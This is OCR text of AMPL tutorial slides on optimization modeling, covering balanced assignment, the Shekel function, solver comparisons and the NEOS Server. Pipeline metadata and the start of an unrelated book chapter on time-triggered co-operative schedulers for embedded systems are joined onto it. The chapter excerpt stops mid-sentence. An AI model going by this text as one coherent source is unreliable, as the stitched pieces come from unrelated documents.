NNW Peoria F Adjunct VAA NNW Peoria M Deputy JRT NNE Springfield M Deputy AMR SSE Peoria M Deputy MES NNE Peoria M Consultant JAD NNE Peoria M Adjunct MJR NNE Springfield M Assistant JRS NNE Springfield M Assistant HCN SSE Peoria M Deputy DAN NNE Springfield M Adjunct ...... param numberGrps := 12 ; param minInGrp := 16 ; param maxInGrp := 19 ; ``` Model-Based Optimization Balanced Assignment Modeling Language Solution Model + data = problem instance to be solved (CPLEX) ampl: model BalAssign.mod; ampl: data BalAssign.dat; ampl: option solver cplex; ampl: option show_stats 1; ampl: solve; 2568 variables: 2532 binary variables 36 linear variables 678 constraints, all linear; 26328 nonzeros 210 equality constraints 456 inequality constraints 12 range constraints 1 linear objective; 36 nonzeros. CPLEX 12.8.0.0: optimal integer solution; objective 16 115096 MIP simplex iterations 1305 branch-and-bound nodes 10.5 sec Balanced Assignment Modeling Language Solution Model + data = problem instance to be solved (Gurobi) ```ampl ampl: model BalAssign.mod; ampl: data BalAssign.dat; ampl: option solver gurobi; ampl: option show_stats 1; ampl: solve; ``` 2568 variables: - 2532 binary variables - 36 linear variables 678 constraints, all linear; 26328 nonzeros - 210 equality constraints - 456 inequality constraints - 12 range constraints 1 linear objective; 36 nonzeros. Gurobi 8.0.0: optimal solution; objective 16 483547 simplex iterations 808 branch-and-cut nodes 108.8 sec Balanced Assignment (logical) Define also \[ Q = \{ i \in P : t_{i,m/f} = \text{female} \} \] Determine \[ z_j \in \{0,1\} = 1 \text{ if any women assigned to group } j \] \[ = 0 \text{ otherwise, for all } j = 1, \ldots, G \] Where \[ z_j = 0 \Rightarrow \sum_{i \in Q} x_{ij} = 0, \] \[ z_j = 1 \Rightarrow \sum_{i \in Q} x_{ij} \geq 2, \text{ for each } j = 1, \ldots, G \] Balanced Assignment in AMPL Supplemental logical constraints ``` set WOMEN = {i in PEOPLE: type[i,'m/f'] = 'F'}; var WomenInGroup {j in 1..numberGrps} binary; subj to Min2WomenInGroup {j in 1..numberGrps}: WomenInGroup[j] = 0 ==> sum {i in WOMEN} Assign[i,j] = 0 else sum {i in WOMEN} Assign[i,j] >= 2; ``` \[ z_j = 0 \Rightarrow \sum_{i \in Q} x_{ij} = 0, \] \[ z_j = 1 \Rightarrow \sum_{i \in Q} x_{ij} \geq 2, \text{ for each } j = 1, \ldots, G \] Balanced Assignment Balanced Assignment in AMPL Send to "linear" solver ampl: model BalAssignWomen.mod ampl: data BalAssign.dat ampl: option solver gurobi; ampl: solve 2568 variables: 2184 binary variables 348 nonlinear variables 36 linear variables 654 algebraic constraints, all linear; 25632 nonzeros 210 equality constraints 432 inequality constraints 12 range constraints 12 logical constraints 1 linear objective; 29 nonzeros. Gurobi 8.0.0: optimal solution; objective 16 265230 simplex iterations 756 branch-and-cut nodes 42.8 sec Balanced Assignment Balanced Assignment in AMPL (refined) Add bounds on variables ```ampl var MinType {k in CATEG, t in TYPES[k]} <= floor (card {i in PEOPLE: type[i,k] = t} / numberGrps); var MaxType {k in CATEG, t in TYPES[k]} >= ceil (card {i in PEOPLE: type[i,k] = t} / numberGrps); ``` ```ampl ampl: solve Presolve eliminates 72 constraints. ... Gurobi 8.0.0: optimal solution; objective 16 1617 simplex iterations 1 branch-and-cut nodes 0.16 sec ``` Nonlinear Optimization in AMPL Example: Shekel function Mathematical Formulation Given - \( m \) number of locally optimal points - \( n \) number of variables and - \( a_{ij} \) for each \( i = 1, \ldots, m \) and \( j = 1, \ldots, n \) - \( c_i \) for each \( i = 1, \ldots, m \) Determine - \( x_j \) for each \( j = 1, \ldots, n \) to maximize \[ \sum_{i=1}^{m} \frac{1}{c_i + \sum_{j=1}^{n} (x_j - a_{ij})^2} \] Modeling Language Formulation *Symbolic model (AMPL)* ```AMPL param m integer > 0; param n integer > 0; param a {1..m, 1..n}; param c {1..m}; var x {1..n}; maximize objective: sum {i in 1..m} 1 / (c[i] + sum {j in 1..n} (x[j] - a[i,j])^2); ``` \[ \sum_{i=1}^{m} \frac{1}{c_i + \sum_{j=1}^{n} (x_j - a_{ij})^2} \] Modeling Language Data Explicit data (independent of model) \begin{verbatim} param m := 5 ; param n := 4 ; param a: 1 2 3 4 := 1 4 4 4 4 2 1 1 1 1 3 8 8 8 8 4 6 6 6 6 5 3 7 3 7 ; param c := 1 0.1 2 0.2 3 0.2 4 0.4 5 0.4 ; \end{verbatim} Modeling Language Solution *Model + data = problem instance to be solved* ```ampl ampl: model shekelEX.mod; ampl: data shekelEX.dat; ampl: option solver knitro; ampl: solve; Knitro 10.3.0: Locally optimal solution. objective 5.055197729; feasibility error 0 6 iterations; 9 function evaluations ampl: display x; x [*] := 1 1.00013 2 1.00016 3 1.00013 4 1.00016 ; ``` Modeling Language Solution ... again with multistart option ```ampl ampl: model shekelEX.mod; ampl: data shekelEX.dat; ampl: option solver knitro; ampl: option knitro_options 'ms_enable=1 ms_maxsolves=100'; ampl: solve; Knitro 10.3.0: Locally optimal solution. objective 10.15319968; feasibility error 0 43 iterations; 268 function evaluations ampl: display x; x [*] := 1 4.00004 2 4.00013 3 4.00004 4 4.00013 ;``` Solution (cont’d) ... again with a “global” solver ``` ampl: model shekelEX.mod; ampl: data shekelEX.dat; ampl: option solver baron; ampl: solve; BARON 17.10.13 (2017.10.13): 43 iterations, optimal within tolerances. Objective 10.15319968 ampl: display x; x [*] := 1 4.00004 2 4.00013 3 4.00004 4 4.00013 ; ``` Solvers for Model-Based Optimization Off-the-shelf solvers for broad problem classes Three widely used types - “Linear” - “Nonlinear” - “Global” “Linear” Solvers Require objective and constraint coefficients Linear objective and constraints - Continuous variables * Primal simplex, dual simplex, interior-point - Integer (including zero-one) variables * Branch-and-bound + feasibility heuristics + cut generation * Automatic transformations to integer: piecewise-linear, discrete variable domains, indicator constraints * “Callbacks” to permit problem-specific algorithmic extensions Quadratic extensions - Convex elliptic objectives and constraints - Convex conic constraints - Variable × binary in objective * Transformed to linear (or to convex if binary × binary) “Linear” Solvers (cont'd) **CPLEX, Gurobi, Xpress** - Dominant commercial solvers - Similar features - Supported by many modeling systems **SAS Optimization, MATLAB intlinprog** - Components of widely used commercial analytics packages - SAS performance within 2x of the “big three” **MOSEK** - Commercial solver strongest for conic problems **CBC, MIPCL, SCIP** - Fastest noncommercial solvers - Effective alternatives for easy to moderately difficult problems - MIPCL within 7x on some benchmarks “Nonlinear” Solvers Require function and derivative evaluations Continuous variables ▶ Smooth objective and constraint functions ▶ Locally optimal solutions ▶ Variety of methods ✫ Interior-point, sequential quadratic, reduced gradient Extension to integer variables “Nonlinear” Solvers Knitro - Most extensive commercial nonlinear solver - Choice of methods; automatic choice of multiple starting points - Parallel runs and parallel computations within methods - Continuous and integer variables CONOPT, LOQO, MINOS, SNOPT - Highly regarded commercial solvers for continuous variables - Implement a variety of methods Bonmin, Ipopt - Highly regarded free solvers - Ipopt for continuous problems via interior-point methods - Bonmin extends to integer variables “Global” Solvers Require expression graphs (or equivalent) Nonlinear + global optimality - Substantially harder than local optimality - Smooth nonlinear objective and constraint functions - Continuous and integer variables BARON - Dominant commercial global solver Couenne - Highly regarded noncommercial global solver LGO - High-quality solutions, may be global - Objective and constraint functions may be nonsmooth Off-the-Shelf Solvers Benchmarks Prof. Hans Mittelmann’s benchmark website DECISION TREE FOR OPTIMIZATION SOFTWARE BENCHMARKS FOR OPTIMIZATION SOFTWARE By Hans Mittelmann (mittelmann at asu.edu) Note that on top of the benchmarks a link to logfiles is given! NOTE ALSO THAT WE DO NOT USE PERFORMANCE PROFILES. SEE THIS PAPER WE USE INSTEAD THE SHIFTED GEOMETRIC MEAN **Off-the-Shelf Solvers** **Benchmarks** *By problem type and test set* - **MIXED INTEGER LINEAR PROGRAMMING** - MILP Benchmark - MIPLIB2010 (4-25-2018) - The Solvable MIPLIB Instances (4-28-2018) (MIPLIB2010) - MILP cases that are slightly pathological (4-25-2018) - Feasibility Benchmark (4-25-2018) (MIPLIB2010) - Infeasibility Detection for MILP (4-25-2018) (MIPLIB2010) - **SEMIDEFINITE/SQL PROGRAMMING** - SQL problems from the 7th DIMACS Challenge (8-8-2002) - Several SDP codes on sparse and other SDP problems (1-17 2018) - Infeasible SDP Benchmark (3-9-2018) - Large SOCP Benchmark (4-25-2018) - MISOCP Benchmark (4-25-2018) - **NONLINEAR PROGRAMMING** - AMPL-NLP Benchmark (4-16-2018) Off-the-Shelf Solvers Benchmarks Documentation, summaries, links to detailed results The following codes were run with a limit of 2 hours on the MIPLIB2010 benchmark set with the MIPLIB2010 scripts (exc Matlab) on two platforms. 1/4 threads: Intel i7-4790K, 4 cores, 32GB, 4GHz, available memory 24GB; 12 threads: Intel Xeon X5680, 2x6 cores, 32GB, 3.33GHz, available memory 24GB. These are updated and extended versions of the results produced for the MIPLIB2010 paper. CPLX-12.8.0: CPLEX GUROBI-8.0.0: GUROBI ug(Scip-cplex): 5.0.0: Parallel development version of SCIP (SCIP+CPLEX/SOPLEX on 1 thread) CBC-2.9.8: CBC XPRESS-8.4.0: XPRESS MATLAB-2018a: MATLAB (intlinprog) MIPCL-1.5.1: MIPCL SAS-OR-14.3: SAS Table for single thread. Result files per solver, Log files per solver Table for 4 threads. Result files per solver, Log files per solver Table for 12 threads. Result files per solver, Log files per solver Statistics of the problems can be obtained from the MIPLIB2010 webpage Unscaled and scaled shifted geometric means of run times All non-successes are counted as max-time. The third line lists the number of problems (87 total) solved. Curious? Try Them Out on NEOS! NEOS Server: State-of-the-Art Solvers for Numerical Optimization The NEOS Server is a free Internet-based service for solving numerical optimization problems. Hosted by the Wisconsin Institute for Discovery at the University of Wisconsin in Madison, the NEOS Server provides access to more than 60 state-of-the-art solvers in more than a dozen optimization categories. Solvers hosted by the University of Wisconsin in Madison run on distributed high-performance machines enabled by the HTCondor software, remote solvers run on machines at Arizona State University, the University of Klagenfurt in Austria, and the University of Minho in Portugal. The NEOS Guide website complements the NEOS Server, showcasing optimization case studies, presenting optimization information and resources, and providing background information on the NEOS Server. **NEOS Server** **Solver & Language Listing** ![Solver & Language Listing](https://neos-server.org/neos/solvers/index.html) ### Linear Programming - Cbc [AMPL Input][GAMS Input][MPS Input] - CPLEX [AMPL Input][GAMS Input][LP Input][MPS Input][NL Input] - cplexmp [AMPL Input][CPLEX Input][MPS Input] - FICO-Xpress [AMPL Input][GAMS Input][MOSEL Input][MPS Input][NL Input] - Gurobi [AMPL Input][GAMS Input][LP Input][MPS Input][NL Input] - MINTO [AMPL Input] - MOSK [AMPL Input][GAMS Input][LP Input][MPS Input][NL Input] - proxy [CPLEX Input][MPS Input] - osqp [AMPL Input][LP Input][MPS Input] - scop [AMPL Input][CPLEX Input][GAMS Input][MPS Input][OSIL Input][ZIMPL Input] - SYMPHONY [MPS Input] ### Mixed Integer Linear Programming - ANTIGONE [GAMS Input] - CONOPT [AMPL Input][GAMS Input] - filter [AMPL Input] - ipopt [AMPL Input][GAMS Input][NL Input] - Knitro [AMPL Input][GAMS Input] - LANCELOT [AMPL Input] ### Mixed Integer Nonlinearly Constrained Optimization - CONOPT [AMPL Input][GAMS Input] - filter [AMPL Input] - ipopt [AMPL Input][GAMS Input][NL Input] - Knitro [AMPL Input][GAMS Input] - LANCELOT [AMPL Input] ### Mixed-Integer Optimal Control Problems - ANTIGONE [GAMS Input] - CONOPT [AMPL Input][GAMS Input] - filter [AMPL Input] - ipopt [AMPL Input][GAMS Input][NL Input] - Knitro [AMPL Input][GAMS Input] - LANCELOT [AMPL Input] About the NEOS Server Solvers - 18 categories, 60+ solvers - Commercial and noncommercial choices - Almost all of the most popular ones Inputs - Modeling languages: AMPL, GAMS, ... - Lower-level formats: MPS, LP, ... Interfaces - Web browser - Special solver (“Kestrel”) for AMPL and GAMS - Python API About the NEOS Server (cont’d) Limits - 8 hours - 3 GBytes Operation - Requests queued centrally, distributed to various servers for solving - 650,000+ requests served in the past year, about 1800 per day or 75 per hour - 17,296 requests on peak day (15 March 2018) Constraint Programming Between method-based and model-based - Relies on solvers - Focus of the work may be on methods or may be on modeling Method-based view - CP solver as a framework for implementation Model-based view - CP solver as an alternative type Method-Based vs. Model-Based Method-based view - Define global constraints to express the problem - Implement methods required to use the constraints in the solver - Filtering, checking, explanation, counting, reification, . . . - Program the search procedure for the solver - Possibly add constraints via restrictions to the search Model-based view - Write a model naturally without linearizing - Not-linear operators: min, max, abs - Logic operators: and, or, not, if-then - Global constraints: alldiff, atleast, atmost - Variables as indices - Send to an off-the-shelf CP solver CP Approach to Balanced Assignment Fewer variables with larger domains ```plaintext var Assign {i in PEOPLE, j in 1..numberGrps} binary; # Assign[i,j] is 1 if and only if # person i is assigned to group j var Assign {i in PEOPLE} integer >= 1, <= numberGrps; # Assign[i] is the group to which i is assigned ``` Balanced Assignment CP Approach Global constraint for assignment to groups subj to AssignAll \{i in PEOPLE\}: \[ \sum_{j \in 1..\text{numberGrps}} \text{Assign}[i,j] = 1; \] # Each person assigned to one group subj to GroupSize \{j \in 1..\text{numberGrps}\}: \[ \text{minInGrp} \leq \sum_{i \in \text{PEOPLE}} \text{Assign}[i,j] \leq \text{maxInGrp}; \] # Each group has an acceptable size subj to GroupSize \{j \in 1..\text{numberGrps}\}: \[ \text{minInGrp} \leq \text{numberOf} j \in (\{i \in \text{PEOPLE} \} \text{Assign}[i]) \leq \text{maxInGrp}; \] # Each group has an acceptable size **Balanced Assignment** **CP Approach** **Disjunctive constraint for women in a group** ```plaintext var WomenInGroup {j in 1..numberGrps} binary; subj to Min2WomenInGroupLO {j in 1..numberGrps}: 2 * WomenInGroup[j] <= sum {i in WOMEN} Assign[i,j]; subj to Min2WomenInGroupUP {j in 1..numberGrps}: sum {i in WOMEN} Assign[i,j] <= card(WOMEN) * WomenInGroup[j]; # Number of women in each group is either # 0 (WomenInGroup[j] = 0) or >= 2 (WomenInGroup[j] = 1) subj to Min2WomenInGroupL {j in 1..numberGrps}: numberof j in ({i in WOMEN} Assign[i]) = 0 or numberof j in ({i in WOMEN} Assign[i]) >= 2; # Number of women in each group is either 0 or >= 2 ``` **Balanced Assignment** **CP Approach** **Solve with IBM ILOG CP** ```plaintext ampl: model BalAssign+CP.mod ampl: data BalAssign.dat ampl: option solver ilogcp; ampl: solve; 246 variables: 36 integer variables 210 nonlinear variables 444 algebraic constraints, all nonlinear; 23112 nonzeros 432 inequality constraints 12 range constraints 12 logical constraints 1 linear objective; 28 nonzeros. ilogcp 12.7.0: optimal solution 512386 choice points, 232919 fails, objective 16 5.3 sec ``` Algebraic Modeling Languages for CP **IBM CPLEX C++ API** - Executable, solver-specific **IBM CPLEX OPL** - Declarative, solver-specific **MiniZinc** - Declarative, solver-independent Summary: Model-Based Optimization Division of labor - Analysts who build symbolic optimization models - Developers who create general-purpose solvers A successful approach across very diverse application areas Modeling languages (like AMPL) bridge the gap between models and solvers - Translate between modeler’s form and algorithm’s form - Maintain independence of model and data - Offer independence of model and data from solver
{"Source-Url": "https://ampl.com/MEETINGS/TALKS/2018_08_Lille_Tutorial1.pdf", "len_cl100k_base": 15259, "olmocr-version": "0.1.53", "pdf-total-pages": 99, "total-fallback-pages": 0, "total-input-tokens": 147903, "total-output-tokens": 19847, "length": "2e13", "weborganizer": {"__label__adult": 0.0004422664642333984, "__label__art_design": 0.0007457733154296875, "__label__crime_law": 0.0005283355712890625, "__label__education_jobs": 0.003705978393554687, "__label__entertainment": 0.00016772747039794922, "__label__fashion_beauty": 0.00028133392333984375, "__label__finance_business": 0.0017499923706054688, "__label__food_dining": 0.00045561790466308594, "__label__games": 0.00115966796875, "__label__hardware": 0.0012235641479492188, "__label__health": 0.0008578300476074219, "__label__history": 0.0005626678466796875, "__label__home_hobbies": 0.0002397298812866211, "__label__industrial": 0.0014171600341796875, "__label__literature": 0.00032711029052734375, "__label__politics": 0.00038313865661621094, "__label__religion": 0.0006055831909179688, "__label__science_tech": 0.197265625, "__label__social_life": 0.0002157688140869141, "__label__software": 0.02655029296875, "__label__software_dev": 0.75927734375, "__label__sports_fitness": 0.0005578994750976562, "__label__transportation": 0.0010290145874023438, "__label__travel": 0.0002963542938232422}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 51260, 0.03034]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 51260, 0.36947]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 51260, 0.74399]], "google_gemma-3-12b-it_contains_pii": [[0, 239, false], [239, 991, null], [991, 1351, null], [1351, 1806, null], [1806, 2176, null], [2176, 2681, null], [2681, 3274, null], [3274, 3820, null], [3820, 4344, null], [4344, 4984, null], [4984, 5485, null], [5485, 5621, null], [5621, 6258, null], [6258, 6619, null], [6619, 6747, null], [6747, 7419, null], [7419, 7698, null], [7698, 8209, null], [8209, 8645, null], [8645, 9249, null], [9249, 10209, null], [10209, 11140, null], [11140, 11648, null], [11648, 12068, null], [12068, 12396, null], [12396, 12920, null], [12920, 13241, null], [13241, 13425, null], [13425, 13852, null], [13852, 14447, null], [14447, 15797, null], [15797, 16234, null], [16234, 17576, null], [17576, 18616, null], [18616, 19013, null], [19013, 19337, null], [19337, 19795, null], [19795, 20328, null], [20328, 20606, null], [20606, 21430, null], [21430, 22264, null], [22264, 22803, null], [22803, 23082, null], [23082, 23760, null], [23760, 24446, null], [24446, 24854, null], [24854, 25184, null], [25184, 25509, null], [25509, 25956, null], [25956, 26460, null], [26460, 26726, null], [26726, 26967, null], [26967, 27186, null], [27186, 27817, null], [27817, 28468, null], [28468, 28885, null], [28885, 29362, null], [29362, 29982, null], [29982, 30833, null], [30833, 31289, null], [31289, 31849, null], [31849, 32292, null], [32292, 32867, null], [32867, 34061, null], [34061, 34847, null], [34847, 35447, null], [35447, 36013, null], [36013, 36396, null], [36396, 36854, null], [36854, 37410, null], [37410, 37870, null], [37870, 37976, null], [37976, 38345, null], [38345, 38666, null], [38666, 38952, null], [38952, 39331, null], [39331, 39754, null], [39754, 40075, null], [40075, 40223, null], [40223, 40865, null], [40865, 41368, null], [41368, 41647, null], [41647, 42151, null], [42151, 42577, null], [42577, 42952, null], [42952, 43675, null], [43675, 44834, null], [44834, 45713, null], [45713, 47073, null], [47073, 47378, null], [47378, 47650, null], [47650, 47912, null], [47912, 48508, null], [48508, 48822, null], [48822, 49443, null], [49443, 50130, null], [50130, 50637, null], [50637, 50824, null], [50824, 51260, null]], "google_gemma-3-12b-it_is_public_document": [[0, 239, true], [239, 991, null], [991, 1351, null], [1351, 1806, null], [1806, 2176, null], [2176, 2681, null], [2681, 3274, null], [3274, 3820, null], [3820, 4344, null], [4344, 4984, null], [4984, 5485, null], [5485, 5621, null], [5621, 6258, null], [6258, 6619, null], [6619, 6747, null], [6747, 7419, null], [7419, 7698, null], [7698, 8209, null], [8209, 8645, null], [8645, 9249, null], [9249, 10209, null], [10209, 11140, null], [11140, 11648, null], [11648, 12068, null], [12068, 12396, null], [12396, 12920, null], [12920, 13241, null], [13241, 13425, null], [13425, 13852, null], [13852, 14447, null], [14447, 15797, null], [15797, 16234, null], [16234, 17576, null], [17576, 18616, null], [18616, 19013, null], [19013, 19337, null], [19337, 19795, null], [19795, 20328, null], [20328, 20606, null], [20606, 21430, null], [21430, 22264, null], [22264, 22803, null], [22803, 23082, null], [23082, 23760, null], [23760, 24446, null], [24446, 24854, null], [24854, 25184, null], [25184, 25509, null], [25509, 25956, null], [25956, 26460, null], [26460, 26726, null], [26726, 26967, null], [26967, 27186, null], [27186, 27817, null], [27817, 28468, null], [28468, 28885, null], [28885, 29362, null], [29362, 29982, null], [29982, 30833, null], [30833, 31289, null], [31289, 31849, null], [31849, 32292, null], [32292, 32867, null], [32867, 34061, null], [34061, 34847, null], [34847, 35447, null], [35447, 36013, null], [36013, 36396, null], [36396, 36854, null], [36854, 37410, null], [37410, 37870, null], [37870, 37976, null], [37976, 38345, null], [38345, 38666, null], [38666, 38952, null], [38952, 39331, null], [39331, 39754, null], [39754, 40075, null], [40075, 40223, null], [40223, 40865, null], [40865, 41368, null], [41368, 41647, null], [41647, 42151, null], [42151, 42577, null], [42577, 42952, null], [42952, 43675, null], [43675, 44834, null], [44834, 45713, null], [45713, 47073, null], [47073, 47378, null], [47378, 47650, null], [47650, 47912, null], [47912, 48508, null], [48508, 48822, null], [48822, 49443, null], [49443, 50130, null], [50130, 50637, null], [50637, 50824, null], [50824, 51260, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 51260, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 51260, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 51260, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 51260, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 51260, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 51260, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 51260, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 51260, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 51260, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 51260, null]], "pdf_page_numbers": [[0, 239, 1], [239, 991, 2], [991, 1351, 3], [1351, 1806, 4], [1806, 2176, 5], [2176, 2681, 6], [2681, 3274, 7], [3274, 3820, 8], [3820, 4344, 9], [4344, 4984, 10], [4984, 5485, 11], [5485, 5621, 12], [5621, 6258, 13], [6258, 6619, 14], [6619, 6747, 15], [6747, 7419, 16], [7419, 7698, 17], [7698, 8209, 18], [8209, 8645, 19], [8645, 9249, 20], [9249, 10209, 21], [10209, 11140, 22], [11140, 11648, 23], [11648, 12068, 24], [12068, 12396, 25], [12396, 12920, 26], [12920, 13241, 27], [13241, 13425, 28], [13425, 13852, 29], [13852, 14447, 30], [14447, 15797, 31], [15797, 16234, 32], [16234, 17576, 33], [17576, 18616, 34], [18616, 19013, 35], [19013, 19337, 36], [19337, 19795, 37], [19795, 20328, 38], [20328, 20606, 39], [20606, 21430, 40], [21430, 22264, 41], [22264, 22803, 42], [22803, 23082, 43], [23082, 23760, 44], [23760, 24446, 45], [24446, 24854, 46], [24854, 25184, 47], [25184, 25509, 48], [25509, 25956, 49], [25956, 26460, 50], [26460, 26726, 51], [26726, 26967, 52], [26967, 27186, 53], [27186, 27817, 54], [27817, 28468, 55], [28468, 28885, 56], [28885, 29362, 57], [29362, 29982, 58], [29982, 30833, 59], [30833, 31289, 60], [31289, 31849, 61], [31849, 32292, 62], [32292, 32867, 63], [32867, 34061, 64], [34061, 34847, 65], [34847, 35447, 66], [35447, 36013, 67], [36013, 36396, 68], [36396, 36854, 69], [36854, 37410, 70], [37410, 37870, 71], [37870, 37976, 72], [37976, 38345, 73], [38345, 38666, 74], [38666, 38952, 75], [38952, 39331, 76], [39331, 39754, 77], [39754, 40075, 78], [40075, 40223, 79], [40223, 40865, 80], [40865, 41368, 81], [41368, 41647, 82], [41647, 42151, 83], [42151, 42577, 84], [42577, 42952, 85], [42952, 43675, 86], [43675, 44834, 87], [44834, 45713, 88], [45713, 47073, 89], [47073, 47378, 90], [47378, 47650, 91], [47650, 47912, 92], [47912, 48508, 93], [48508, 48822, 94], [48822, 49443, 95], [49443, 50130, 96], [50130, 50637, 97], [50637, 50824, 98], [50824, 51260, 99]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 51260, 0.02892]]}
olmocr_science_pdfs
2024-12-06
2024-12-06
226da19eaec28a85d093d44b40335ededd0420cc
We are IntechOpen, the world’s leading publisher of Open Access books Built by scientists, for scientists 3,800 Open access books available 116,000 International authors and editors 120M Downloads 154 Countries delivered to TOP 1% Our authors are among the most cited scientists 12.2% Contributors from top 500 universities WEB OF SCIENCE™ Selection of our books indexed in the Book Citation Index in Web of Science™ Core Collection (BKCI) Interested in publishing with us? Contact book.department@intechopen.com Numbers displayed above are based on latest data collected. For more information visit www.intechopen.com 1. Introduction Embedded system is a special-purpose computer system which is designed to perform a small number of dedicated functions for a specific application (Sachitanand, 2002; Kamal, 2003). Examples of applications using embedded systems are: microwave ovens, TVs, VCRs, DVDs, mobile phones, MP3 players, washing machines, air conditions, handheld calculators, printers, digital watches, digital cameras, automatic teller machines (ATMs) and medical equipments (Barr, 1999; Bolton, 2000; Fisher et al., 2004; Pop et al., 2004). Besides these applications, which can be viewed as “noncritical” systems, embedded technology has also been used to develop “safety-critical” systems where failures can have very serious impacts on human safety. Examples include aerospace, automotive, railway, military and medical applications (Redmill, 1992; Profeta et al., 1996; Storey, 1996; Konrad et al., 2004). The utilization of embedded systems in safety-critical applications requires that the system should have real-time operations to achieve correct functionality and/or avoid any possibility for detrimental consequences. Real-time behavior can only be achieved if the system is able to perform predictable and deterministic processing (Stankovic, 1988; Pont, 2001; Buttazzo, 2005; Phatrapornnant, 2007). As a result, the correct behavior of a real-time system depends on the time at which these results are produced as well as the logical correctness of the output results (Avrunin et al., 1998; Kopetz, 1997). In real-time embedded applications, it is important to predict the timing behavior of the system to guarantee that the system will behave correctly and consequently the life of the people using the system will be saved. Hence, predictability is the key characteristic in real-time embedded systems. Embedded systems engineers are concerned with all aspects of the system development including hardware and software engineering. Therefore, activities such as specification, design, implementation, validation, deployment and maintenance will all be involved in the development of an embedded application (Fig. 1). A design of any system usually starts with ideas in people’s mind. These ideas need to be captured in requirements specification documents that specify the basic functions and the desirable features of the system. The system design process then determines how these functions can be provided by the system components. Fig. 1. The system development life cycle (Nahas, 2008). For successful design, the system requirements have to be expressed and documented in a very clear way. Inevitably, there can be numerous ways in which the requirements for a simple system can be described. Once the system requirements have been clearly defined and well documented, the first step in the design process is to design the overall system architecture. Architecture of a system basically represents an overview of the system components (i.e. sub-systems) and the interrelationships between these different components. Once the software architecture is identified, the process of implementing that architecture should take place. This can be achieved using a lower-level system representation such as an operating system or a scheduler. Scheduler is a very simple operating system for an embedded application (Pont, 2001). Building the scheduler would require a scheduling algorithm which simply provides the set of rules that determine the order in which the tasks will be executed by the scheduler during the system operating time. It is therefore the most important factor which influences predictability in the system, as it is responsible for satisfying timing and resource requirements (Buttazzo, 2005). However, the actual implementation of the scheduling algorithm on the embedded microcontroller has an important role in determining the functional and temporal behavior of the embedded system. This chapter is mainly concerned with so-called “Time-Triggered Co-operative” (TTC) schedulers and how such algorithms can be implemented in highly-predictable, resource-constrained embedded applications. The layout of the chapter is as follows. Section 2 provides a detailed comparison between the two key software architectures used in the design of real-time embedded systems, namely "time-triggered" and "event-triggered". Section 3 introduces and compares the two most known scheduling policies, "co-operative" and "pre-emptive", and highlights the advantages of co-operative over pre-emptive scheduling. Section 4 discusses the relationship between scheduling algorithms and scheduler implementations in practical embedded systems. In Section 5, Time-Triggered Co-operative (TTC) scheduling algorithm is introduced in detail with a particular focus on its strengths and drawbacks and how such drawbacks can be addressed to maintain its reliability and predictability attributes. Section 6 discusses the sources and impact of timing jitter in TTC scheduling algorithm. Section 7 describes various possible ways in which the TTC scheduling algorithm can be implemented on resource-constrained embedded systems that require highly-predictable system behavior. In Section 8, the various scheduler implementations are compared and contrasted in terms of jitter characteristics, error handling capabilities and resource requirements. The overall chapter conclusions are presented in Section 9. 2. Software architectures of embedded systems Embedded systems are composed of hardware and software components. The success of an embedded design, thus, depends on the right selection of the hardware platform(s) as well Ways for Implementing Highly-Predictable Embedded Systems Using Time-Triggered Co-Operative (TTC) Architectures as the software environment used in conjunction with the hardware. The selection of hardware and software architectures of an application must take place at early stages in the development process (typically at the design phase). Hardware architecture relates mainly to the type of the processor (or microcontroller) platform(s) used and the structure of the various hardware components that are comprised in the system: see Mwelwa (2006) for further discussion about hardware architectures for embedded systems. Provided that the hardware architecture is decided, an embedded application requires an appropriate form of software architecture to be implemented. To determine the most appropriate choice for software architecture in a particular system, this condition must be fulfilled (Locke, 1992): “The [software] architecture must be capable of providing a provable prediction of the ability of the application design to meet all of its time constraints.” Since embedded systems are usually implemented as collections of real-time tasks, the various possible system architectures may then be determined by the characteristics of these tasks. In general, there are two main software architectures which are typically used in the design of embedded systems: Event-triggered (ET): tasks are invoked as a response to aperiodic events. In this case, the system takes no account of time: instead, the system is controlled purely by the response to external events, typically represented by interrupts which can arrive at anytime (Bannatyne, 1998; Kopetz, 1991b). Generally, ET solution is recommended for applications in which sporadic data messages (with unknown request times) are exchanged in the system (Hsieh and Hsu, 2005). Time-triggered (TT): tasks are invoked periodically at specific time intervals which are known in advance. The system is usually driven by a global clock which is linked to a hardware timer that overflows at specific time instants to generate periodic interrupts (Bennett, 1994). In distributed systems, where multi-processor hardware architecture is used, the global clock is distributed across the network (via the communication medium) to synchronise the local time base of all processors. In such architectures, time-triggering mechanism is based on time-division multiple access (TDMA) in which each processor-node is allocated a periodic time slot to broadcast its periodic messages (Kopetz, 1991b). TT solution can suit many control applications where the data messages exchanged in the system are periodic (Kopetz, 1997). Many researchers argue that ET architectures are highly flexible and can provide high resource efficiency (Obermaisser, 2004; Locke, 1992). However, ET architectures allow several interrupts to arrive at the same time, where these interrupts might indicate (for example) that two different faults have been detected at the same time. Inevitably, dealing with an occurrence of several events at the same time will increase the system complexity and reduce the ability to predict the behavior of the ET system (Scheler and Schröder-Preikschat, 2006). In more severe circumstances, the system may fail completely if it is heavily loaded with events that occur at once (Marti, 2002). In contrast, using TT architectures helps to ensure that only a single event is handled at a time and therefore the behavior of the system can be highly-predictable. Since highly-predictable system behavior is an important design requirement for many embedded systems, TT software architectures have become the subject of considerable attention (e.g. see Kopetz, 1997). In particular, 